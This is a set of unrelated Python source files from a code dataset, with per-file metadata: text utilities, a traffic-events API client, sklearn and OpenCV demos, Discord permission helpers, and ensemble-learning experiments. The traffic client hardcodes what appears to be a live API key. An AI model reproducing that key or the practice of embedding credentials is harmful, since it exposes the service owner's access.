OUT_OF_VOC_WORDS.add(line.strip().lower())\n\n\ndef cache_old_spellings():\n global OLD_SPELLINGS\n if OLD_SPELLINGS is None:\n OLD_SPELLINGS = dict()\n with codecs.open(OLD_SPELLINGS_FILENAME, 'r', 'utf-8') as fin:\n for line in fin:\n parts = 
line.strip().lower().split(OLD_SPELLING_DELIMITER)\n                OLD_SPELLINGS[parts[0]] = parts[1]\n", "sub_path": "dictionaries/language_utils.py", "file_name": "language_utils.py", "file_ext": "py", "file_size_in_byte": 5074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymorphy2.MorphAnalyzer", "line_number": 12, "usage_type": "call"}, {"api_name": "dictionary_utils.get_selkup_by_meaning", "line_number": 74, "usage_type": "call"}, {"api_name": "web_utils.get_url_data", "line_number": 93, "usage_type": "call"}, {"api_name": "html_utils.transform_to_html", "line_number": 97, "usage_type": "call"}, {"api_name": "html_utils.get_first_html_tag", "line_number": 98, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 152, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "489249189", "text": "import sys, os, time\nsys.path.insert(0, os.path.join(os.path.dirname(__file__),'libs'))\nimport requests\nimport xml.etree.ElementTree as ET\n\ndef output_text(msg):\n\tfor char in msg:\n\t\tsys.stdout.write ( '%s' % char)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.05)\n\t#print ''\n\ndef fetchURL(lat,lon,radius):\n\tpayload = {'near': str(lat) + ',' + str(lon) + ',' + str(radius)}\n\trequesturl='http://api.stride-project.com/events/feeds/d38a9c31-3156-446e-a89e-79aa3d7357c2/datastreams/1/events'\n\tr = requests.get(requesturl, params=payload, auth=('7b399134-f740-4432-9a3e-f6d711473558', ''))\n\treturn r\n\ndef parseData(lat, lon, radius):\n\tdata = fetchURL(lat, lon, radius)\n\tparsedXML = ET.fromstring(data.text)\n\tevents=[]\n\tfor x in range(10):\n\t\ttry:\n\t\t\tid = parsedXML[x].text\n\t\t\tdescrip = parsedXML[x][5][5].text\n\t\t\turgency = parsedXML[x][5][2].text\n\t\t\tseverity = parsedXML[x][5][3].text\n\t\t\tcertainty = parsedXML[x][5][4].text\n\t\t\tlatlong = parsedXML[x][5][9][0].text\n\t\t\troad = parsedXML[x][5][9][5].text\n\t\t\tdirection = parsedXML[x][5][9][4].text\n\t\t\tintersection = parsedXML[x][5][9][1].text\n\t\t\tevents.append({'id': id, 'descrip': descrip, 'urgency' : urgency, 'severity': severity, 'certainty':certainty, 'latlong' : latlong, 'road': road, 'direction': direction, 'intersection' : intersection})\n\t\texcept IndexError:\n\t\t\tpass\n\treturn events\n\n#currentEvents = parseData(52.211604, 0.09166, 10000)\n\ndef outputMessage():\n\tfor event in currentEvents:\n\t\tmessage = 'There is a ' + event['severity'] + ' problem on the ' + event['road'] + ' ' + event['direction'] + ' near ' + event['intersection'] + '.\\n' + event['descrip']\n\t\toutput_text(message)\n", "sub_path": "frontend/stride.py", "file_name": "stride.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 9, "usage_type": "attribute"}, {"api_name": 
"time.sleep", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 21, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "74217860", "text": "# Creating a perceptron using scikit_learn's Perceptron class and the iris dataset\n\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import Perceptron\nfrom iris_common_funcs import plot_decision_regions, initializer\n\n\nX_train_std, y_train, X_combined_std, y_combined = initializer()\nppn = Perceptron(max_iter=40, eta0=0.1, random_state=0).fit(X_train_std, y_train)\nplot_decision_regions(X=X_combined_std, y=y_combined, classifier=ppn, test_idx=range(105, 150))\n\nplt.xlabel(\"Sepal length (standardized)\")\nplt.ylabel(\"Petal length (standardized)\")\nplt.legend(loc='upper left')\nplt.show()", "sub_path": "Iris/iris_perceptron.py", "file_name": "iris_perceptron.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "iris_common_funcs.initializer", "line_number": 8, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Perceptron", "line_number": 9, "usage_type": "call"}, {"api_name": "iris_common_funcs.plot_decision_regions", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "216388313", "text": "import cv2\n\nsrc = cv2.imread('inRange.jpg')\n# size 축소\nsrc = cv2.resize(src, (0, 0), fx=0.5, fy=0.5, interpolation=cv2.INTER_NEAREST)\n\nsrc_hsv = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)\n\n# 0 < B < 100 , 128 < G < 255 , 0 < R < 100\ndst1 = cv2.inRange(src, (0, 128, 0), (100, 255, 100))\nimg_result = cv2.bitwise_and(src_hsv, src_hsv, mask = dst1)\n\ndst2 = cv2.inRange(src_hsv, (50, 150, 0), (80, 255, 255))\nimg_result2 = cv2.bitwise_and(src_hsv, src_hsv, mask = dst2)\n\ncv2.imshow('src', src)\ncv2.moveWindow('src',400,100)\n\ncv2.imshow('dst1', dst1)\ncv2.moveWindow('dst1',400,450)\n\ncv2.imshow('img_result', img_result)\ncv2.moveWindow('img_result',800,450)\n\n\ncv2.imshow('dst2', dst2)\ncv2.moveWindow('dst2',400,800)\n\n\ncv2.imshow('img_result2', img_result2)\ncv2.moveWindow('img_result2',1100,450)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n", "sub_path": "inRange02.py", "file_name": "inRange02.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 7, "usage_type": "attribute"}, 
{"api_name": "cv2.inRange", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "52516952", "text": "# contains:\n#\t - general helpers\n#\t - discord helpers\n\n\n# GENERAL HELPERS #\n\nimport os\nimport json\nimport time\n\ndef file_contents( file, silent=False ):\n\tencodings = [ 'utf-8', 'latin1' ]\n\tfor e in encodings:\n\t\ttry:\n\t\t\tif not os.path.isfile( file ):\n\t\t\t\tif not silent:\n\t\t\t\t\tprint( 'file not found: ' + file )\n\t\t\t\treturn ''\n\t\t\t\t\n\t\t\twith open( file, 'r', encoding=e ) as f:\n\t\t\t\toutput = f.read()\n\t\t\t\tf.close()\n\t\t\t\treturn output\n\t\texcept UnicodeDecodeError:\n\t\t\tprint( 'decode error: ' + file )\n\t\t\treturn ''\n\t\telse:\n\t\t\tprint( 'unknown error: ' + file )\n\t\t\treturn ''\n\ndef is_json( data, fn='unknown file' ):\n\ttry:\n\t\tjson_object = json.loads( data )\n\texcept ValueError:\n\t\tprint( 'invalid json in ' + fn )\n\t\treturn False\n\treturn True\n\t\ndef load_json( file, silent=False ):\n\ttext = file_contents( file, silent )\n\tif text == '' or is_json( text, file ) == False:\n\t\treturn {}\n\treturn json.loads( text )\n\t\ndef file_write( file, data ):\n\tf = open( file, 'w' )\n\tf.write( data )\n\tf.close()\n\t\ndef pretty_date( d ):\n\tif d == 0:\n\t\treturn 'never'\n\ts = time.time() - d\n\tday = 86400\n\tif s > day * 1:\n\t\treturn '%d days ago' % round( s / day )\n\telif s <= 70:\n\t\treturn 'just now'\n\telif s < 120:\n\t\treturn '1 minute ago'\n\telif s < 3600:\n\t\treturn '%s minutes ago' % round( s / 60 )\n\telif s < 7200:\n\t\treturn '1 hour ago'\n\telse:\n\t\treturn '%s hours ago' % round( s / 3600 )\n\t\t\ndef module_exists( module_name ):\n try:\n __import__( module_name )\n except ImportError:\n return False\n else:\n return True\n\t\n\n# DISCORD HELPERS #\n\t\nimport discord\nfrom discord.ext import commands\nimport settings\n\t\t\t\ndef is_owner( ctx ):\n\tif ctx.message.author.id == settings.config['owner_id']:\n\t\treturn True\n\treturn False\n\t\t\t\ndef needs_owner():\n\treturn commands.check( is_owner )\n\t\ndef is_admin( ctx ):\n\tif is_owner( ctx ):\n\t\treturn True\n\tif ctx.message.channel.is_private:\n\t\treturn False\n\trole = discord.utils.find( lambda r: r.name == settings.config['admin_role'], ctx.message.author.roles )\n\treturn role is not None\n\t\t\t\ndef needs_admin():\n\treturn commands.check( is_admin )\n", "sub_path": "helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": 
"python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.isfile", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "settings.config", "line_number": 85, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.check", "line_number": 90, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 90, "usage_type": "name"}, {"api_name": "discord.utils.find", "line_number": 97, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 97, "usage_type": "attribute"}, {"api_name": "settings.config", "line_number": 97, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.check", "line_number": 101, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 101, "usage_type": "name"}]} +{"seq_id": "559774040", "text": "from numpy import *\nimport numpy as np\nimport json\nimport sys\nimport DecisionTree as dt\n\n\ndef getArgs():\n if len(sys.argv) == 4:\n clsfr = str(sys.argv[1])\n train = str(sys.argv[2])\n test = str(sys.argv[3])\n else:\n sys.exit('Illegal Arg Exception')\n return train, test, clsfr\n\n\ndef loadData(fileName):\n feature = []\n with open(fileName, 'r') as write_file:\n data = json.load(write_file)\n metadata = np.array(data['metadata']['features'])\n for b in data['metadata']['features']:\n feature.append(b[1])\n return np.array(data['data']), metadata, np.array(feature)\n\n\ndef learner(train_data, T, depth):\n mytree = dt.DecisionTree()\n total_predict_y = []\n m = len(train_data)\n n_test = len(test_data)\n training_sample_indices = np.zeros((T, m)).astype(int)\n\n test_output = np.zeros((T, n_test, len(classes)))\n\n for i in range(T):\n training_sample_indices[i] = np.random.choice(m, m, replace=True)\n training_samples = train_data[training_sample_indices[i], :]\n\n trainX = training_samples[:, :-1]\n trainy = training_samples[:, -1]\n mytree.fit(trainX, trainy, training_metadata, max_depth=depth)\n predicted_y = mytree.predict(test_X, prob=True)\n test_output[i] = predicted_y\n\n avg_prob = np.average(test_output, axis=0)\n actual = test_y\n predictions = np.zeros(n_test).astype(object)\n\n for i in range(len(test_data)):\n for j in range(T):\n tree_pred_idx = np.argmax(test_output[j, i, :])\n tree_pred = classes[tree_pred_idx]\n\n pred_idx = np.argmax(avg_prob[i, :])\n predictions[i] = classes[pred_idx]\n\n acc = (predictions == test_y).sum() / n_test\n return acc\n\n\ndef adaboost_classifier(train_x, train_y, test_x, test_y, T, depth):\n n_train = len(train_x)\n n_test = len(test_x)\n k = len(classes)\n mytree = dt.DecisionTree()\n\n wts = np.zeros((n_train, T + 1))\n wts[:, 0] = 1 / n_train\n pred_test = np.zeros((n_test, T + 2)).astype(object)\n alpha = np.zeros(T)\n for i in range(T):\n mytree.fit(train_x, train_y, training_metadata, depth, wts[:, i])\n predictions_y = mytree.predict(train_x)\n err = 0\n # compute weights\n for j in range(n_train):\n if predictions_y[j] != train_y[j]:\n err += wts[j, i]\n # break the loop based on error criteria\n if err >= (1 - (1/k)):\n break\n\n alpha[i] = np.log((1 - err)/err) + np.log(k-1)\n\n for j in range(n_train):\n if predictions_y[j] != train_y[j]:\n wts[j, i+1] = wts[j, i] * np.exp(alpha[i])\n else:\n wts[j, i+1] = wts[j, i]\n # 
normalize\n wts[:, i+1] = [x / sum(wts[:, i+1]) for x in wts[:, i+1]]\n pred_test[:, i] = mytree.predict(test_x)\n\n pred_test[:, -1] = test_y\n\n\n alphas = np.zeros(k)\n correct = 0\n for i in range(n_test):\n for cls_idx, cls in enumerate(classes):\n idxs = np.argwhere(pred_test[i, :-2] == cls)\n alphas[cls_idx] = len(idxs) * alpha[idxs].sum()\n pred_test[i, -2] = classes[np.argmax(alphas)]\n if pred_test[i, -2] == pred_test[i, -1]:\n correct += 1\n\n actual = pred_test[:, -1]\n predictions = pred_test[:, -2]\n\n # accuracy\n acc = correct/n_test\n\n return acc\n\n\nnp.random.seed(0)\ntraining_set, test_set, clsfr = getArgs()\ntraining_data, training_metadata, feature_range = loadData(training_set)\nclasses = feature_range[-1]\nfeatures = training_metadata[0:-1, 0]\nfeature_types = training_metadata[0:-1, 1]\ntrain_labels = np.array(training_data[:, -1])\ntrain_X = training_data[:, :-1]\ntrain_y = training_data[:, -1]\n\ntest_data, test_metadata, feature_range_test = loadData(test_set)\ntest_data = np.array(test_data)\ntest_X = test_data[:, :-1]\ntest_y = test_data[:, -1].astype(object)\n\nk = len(classes)\nconfusion_matrix = np.zeros((k,k)).astype(int)\nactual = []\npredicted = []\nif clsfr == \"bag\":\n for i in range(1, 11):\n accuracy = learner(training_data, i, 12)\n print(accuracy)\nelse:\n for i in range(1, 11):\n accuracy = adaboost_classifier(train_X, train_y, test_X, test_y, i, 12)\n print(accuracy)\n\n\n\n", "sub_path": "graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 4256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "DecisionTree.DecisionTree", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 56, "usage_type": "call"}, {"api_name": "DecisionTree.DecisionTree", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.seed", 
"line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "606531671", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 6 02:43:04 2019\r\n\r\n@author: Guangyu\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 5 00:06:32 2019\r\n\r\n@author: Guangyu\r\n\"\"\"\r\n\r\n\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.models import Model\r\nfrom keras.layers import Dense, Dropout, Flatten, BatchNormalization, ReLU, Input\r\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D\r\nfrom keras import backend as K\r\nfrom keras.callbacks import ModelCheckpoint\r\nimport h5py\r\nimport numpy as np\r\nimport struct\r\nimport scipy\r\nfrom scipy import stats\r\nimport scipy.io as sio\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport timeit\r\nimport numpy as np\r\nimport scipy.io as sio \r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import SVC \r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import tree\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom IPython.display import Image\r\nimport pydotplus \r\nfrom numpy import ones\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn import decomposition\r\nfrom sklearn.naive_bayes import GaussianNB\r\n\r\n\r\ndata1 = sio.loadmat('XTrain_same_with_NN_4_160.mat')\r\ndata1 = data1.get('Feature_Input_raw_train')\r\n\r\n\r\ndata2 = sio.loadmat('XTest_same_with_NN_4_160.mat')\r\ndata2 = data2.get('Feature_Input_raw_test')\r\n#data2 = data2.transpose()\r\n\r\nytrain = sio.loadmat('YTrain_same_with_NN_4_160.mat')\r\ndata_train_label = ytrain.get('YTrain')\r\n\r\nytest = sio.loadmat('YTest_same_with_NN_4_160.mat')\r\ndata_test_label = ytest.get('YTest')\r\n\r\nytrain1 = sio.loadmat('target_train_3_class_19_01_2020.mat')\r\ndata_train_label_1 = ytrain1.get('target_train')\r\n\r\nytest1 = sio.loadmat('target_test_3_class_19_01_2020.mat')\r\ndata_test_label_1 = ytest1.get('target_test')\r\n\r\nytest_target = sio.loadmat('data_target_160.mat')\r\nytest_target= ytest_target.get('data_target')\r\nytest_target1 = []\r\nfor i in ytest_target:\r\n temp = i\r\n ytest_target1.append(temp)\r\n \r\n#####################################old nn\r\nmodel = Sequential()\r\nmodel.add(Dense(units=200,activation='relu', input_dim=4))\r\nmodel.add(Dense(units=200,activation='relu'))\r\nmodel.add(Dense(units=200,activation='relu'))\r\nmodel.add(Dense(units=10,activation='softmax'))\r\nmodel.compile(optimizer='sgd', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\nmodel.fit(data1, ytrain1,\r\n batch_size=128,\r\n epochs=100, \r\n verbose=1,\r\n shuffle=True)\r\n\r\nfrom neupy import algorithms\r\nlmnet = algorithms.LevenbergMarquardt((4, 10, 10),show_epoch=1)\r\nlmnet.train(data1, ytrain1)\r\n\r\n\r\n\r\n##################################rf top classifier\r\ndata_train_label = np.ravel(data_train_label_1)\r\nclf_rf = 
RandomForestClassifier()\r\nclf_rf.fit(data1, data_train_label_1)\r\ny_pred_rf = clf_rf.predict(data2)\r\nacc_rf = accuracy_score(data_test_label_1, y_pred_rf)\r\nprint(acc_rf)\r\nacc_rf_train = clf_rf.score(data1, data_train_label_1)\r\nprint(acc_rf_train)\r\n#0.9625\r\n#0.996875\r\n#################################rf \r\ndata_train_label = np.ravel(data_train_label)\r\nclf_rf = RandomForestClassifier()\r\nclf_rf.fit(data1, data_train_label)\r\ny_pred_rf = clf_rf.predict(data2)\r\nacc_rf = accuracy_score(data_test_label, y_pred_rf)\r\nprint(acc_rf)\r\nacc_rf_train = clf_rf.score(data1, data_train_label)\r\nprint(acc_rf_train)\r\n################################svm\r\ny_train = np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf_svm = SVC(kernel='rbf') \r\nclf_svm.fit(data1, y_train)\r\ny_pred_svm = clf_svm.predict(data2)\r\nacc_svm = accuracy_score(y_test, y_pred_svm)\r\nprint(acc_svm)\r\nacc_svm_train = clf_svm.score(data1, y_train)\r\nprint(acc_svm_train)\r\nacc_svm_test = clf_svm.score(data2, y_test)\r\nprint(acc_svm_test)\r\n\r\n#72.5%\r\n##################################dt\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(data1, data_train_label)\r\ny_pred_decisiontree = clf.predict(data2)\r\nscore=clf.score(data2,data_test_label)\r\nprint(\"%f\"%score)\r\nscore_train=clf.score(data1, data_train_label)\r\nprint(\"%f\"%score_train)\r\n\r\ndot_data = tree.export_graphviz(clf, out_file=None, \r\n filled=True, rounded=True) \r\ngraph = pydotplus.graph_from_dot_data(dot_data) \r\n#Image(graph.create_png())\r\n#graph.write_jpg(\"dt.jpg\")\r\n#0.90\r\n##################################dt-top-3\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(data1, data_train_label_1)\r\ny_pred_decisiontree = clf.predict(data2)\r\nscore=clf.score(data2,data_test_label_1)\r\nprint(\"%f\"%score)\r\nscore_train=clf.score(data1, data_train_label_1)\r\nprint(\"%f\"%score_train)\r\n###0.931250\r\n###1.000000\r\ndot_data = tree.export_graphviz(clf, out_file=None, \r\n filled=True, rounded=True) \r\ngraph = pydotplus.graph_from_dot_data(dot_data) \r\n#Image(graph.create_png())\r\n#graph.write_jpg(\"dt.jpg\")\r\n#0.90\r\n##################################knn\r\nclf_knn = KNeighborsClassifier(n_neighbors=3)\r\nclf_knn.fit(data1, data_train_label)\r\ny_pred_knn = clf_knn.predict(data2)\r\nacc_knn = accuracy_score(data_test_label, y_pred_knn)\r\nprint(acc_knn)\r\nacc_knn_train = clf_knn.score(data1, data_train_label)\r\nprint(acc_knn_train)\r\n##################################### knn-3\r\nclf_knn = KNeighborsClassifier(n_neighbors=3)\r\nclf_knn.fit(data1, data_train_label_1)\r\ny_pred_knn = clf_knn.predict(data2)\r\nacc_knn = accuracy_score(data_test_label_1, y_pred_knn)\r\nprint(acc_knn)\r\nacc_knn_train = clf_knn.score(data1, data_train_label_1)\r\nprint(acc_knn_train)\r\n\r\n#95%\r\n##################################################nn\r\ny_train = np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf_nn = MLPClassifier(hidden_layer_sizes=(21,21,21,),verbose=1,activation='logistic')\r\nclf_nn.fit(data1, y_train)\r\ny_pred_nn = clf_nn.predict(data2)\r\nacc_nn = clf_nn.score(data2,y_test)\r\nprint(acc_nn)\r\n#0.1\r\n####################################################sgd\r\nclf_sgd = SGDClassifier()\r\nclf_sgd.fit(data1, data_train_label)\r\ny_pred_sgd = clf_sgd.predict(data2)\r\nacc_sgd = accuracy_score(data_test_label, y_pred_sgd)\r\nprint(\"stochastic gradient descent accuracy: \",acc_sgd)\r\n\r\n##########################################################regression\r\ny_train 
= np.ravel(data_train_label)\r\ny_test = np.ravel(data_test_label)\r\nclf = LogisticRegression()\r\nclf.fit(data1,y_train)\r\nlr_test_sc=clf.score(data2,y_test)\r\nprint(\"regression: \",lr_test_sc)\r\nlr_train_sc=clf.score(data1,y_train)\r\nprint(\"regression: \",lr_train_sc)\r\n##########################################nb\r\nclf_gnb = GaussianNB()\r\nclf_gnb.fit(data1,y_train)\r\ny_pred_gnb = clf_gnb.predict(data2)\r\nacc_gnb = clf_gnb.score(data2, y_test)\r\nprint(\"nb accuracy: \",acc_gnb)\r\nacc_gnb_train = clf_gnb.score(data1, y_train)\r\nprint(\"nb accuracy: \",acc_gnb_train)\r\n\r\n##############################################AE+CNN\r\ndata1 = sio.loadmat('XTrain_same_with_NN_4_160.mat')\r\ndata1 = data1.get('Feature_Input_raw_train')\r\ndata1 = data1.reshape((320,2,2,1))\r\n\r\ndata2 = sio.loadmat('XTest_same_with_NN_4_160.mat')\r\ndata2 = data2.get('Feature_Input_raw_test')\r\ndata2 = data2.reshape((160,2,2,1))\r\n\r\ninput_img = Input(shape=(2,2,1))\r\nx = Conv2D(100, kernel_size=(2,1),activation='relu',padding = 'same')(input_img)\r\nx = BatchNormalization()(x)\r\nencoded = ReLU()(x)\r\nx = BatchNormalization()(encoded)\r\nx = Conv2D(100,(2,1),activation='relu', padding = 'same')(x)\r\ndecoded = Conv2D(1,(2,1),activation='relu', padding = 'same')(x)\r\n\r\nautoencoder = Model(input_img, decoded)\r\nautoencoder.summary()\r\nautoencoder.compile(optimizer='adam', loss='mean_squared_error',\r\n metrics = ['accuracy'])\r\n#earlystop=keras.callbacks.EarlyStopping(monitor='acc', min_delta=0, patience=3, verbose=0, mode='min')\r\nautoencoder.fit(data1, data1,\r\n batch_size=20,\r\n epochs=250,\r\n verbose=1,\r\n shuffle=True)\r\n #callbacks=[earlystop])\r\n\r\n\r\nencoder = Model(input_img, encoded)\r\nencoder.summary()\r\n\r\nlayer_index = 4\r\nintermediate_layer_model = Model(inputs=autoencoder.input,\r\n outputs=autoencoder.get_layer(index = layer_index).output)\r\nintermediate_output = intermediate_layer_model.predict(data1)\r\nintermediate_output_2 = intermediate_layer_model.predict(data2)\r\n\r\na = intermediate_output.shape\r\na = a[1:]\r\n\r\n\r\nytrain1 = keras.utils.to_categorical(data_train_label,11)\r\nytrain1 = np.delete(ytrain1,0,axis=1)\r\nytest1 = keras.utils.to_categorical(data_test_label,11)\r\nytest1 = np.delete(ytest1,0,axis=1)\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, BatchNormalization, ReLU\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(100, kernel_size=(2, 1),activation='relu',input_shape=a,padding = 'same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(ReLU())\r\nmodel.add(Conv2D(100, kernel_size=(2, 1),activation='relu',input_shape=a,padding = 'same'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(ReLU())\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.10))\r\n#model.add(Dense(10, activation='relu'))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nmodel.compile(loss='mse', \r\n optimizer = 'adam',\r\n metrics = ['accuracy'])\r\n#optimizer = keras.optimizers.Adam(lr=0.001,beta_1=0.90,beta_2=0.999,epsilon=None,decay=0.0,amsgrad=False), \r\n#optimizer = keras.optimizers.Adadelta(lr=1.0, rho=0.95, epsilon=None, decay=0.0),\r\nmodel.summary()\r\n\r\nmodel.fit(intermediate_output, ytrain1,\r\n batch_size=20,\r\n epochs=250, \r\n verbose=1,\r\n shuffle=True,\r\n validation_data=(intermediate_output_2, ytest1))\r\n #validation_data=(intermediate_output_2, ytest1))\r\n\r\nmodel.compile(loss='mse', \r\n 
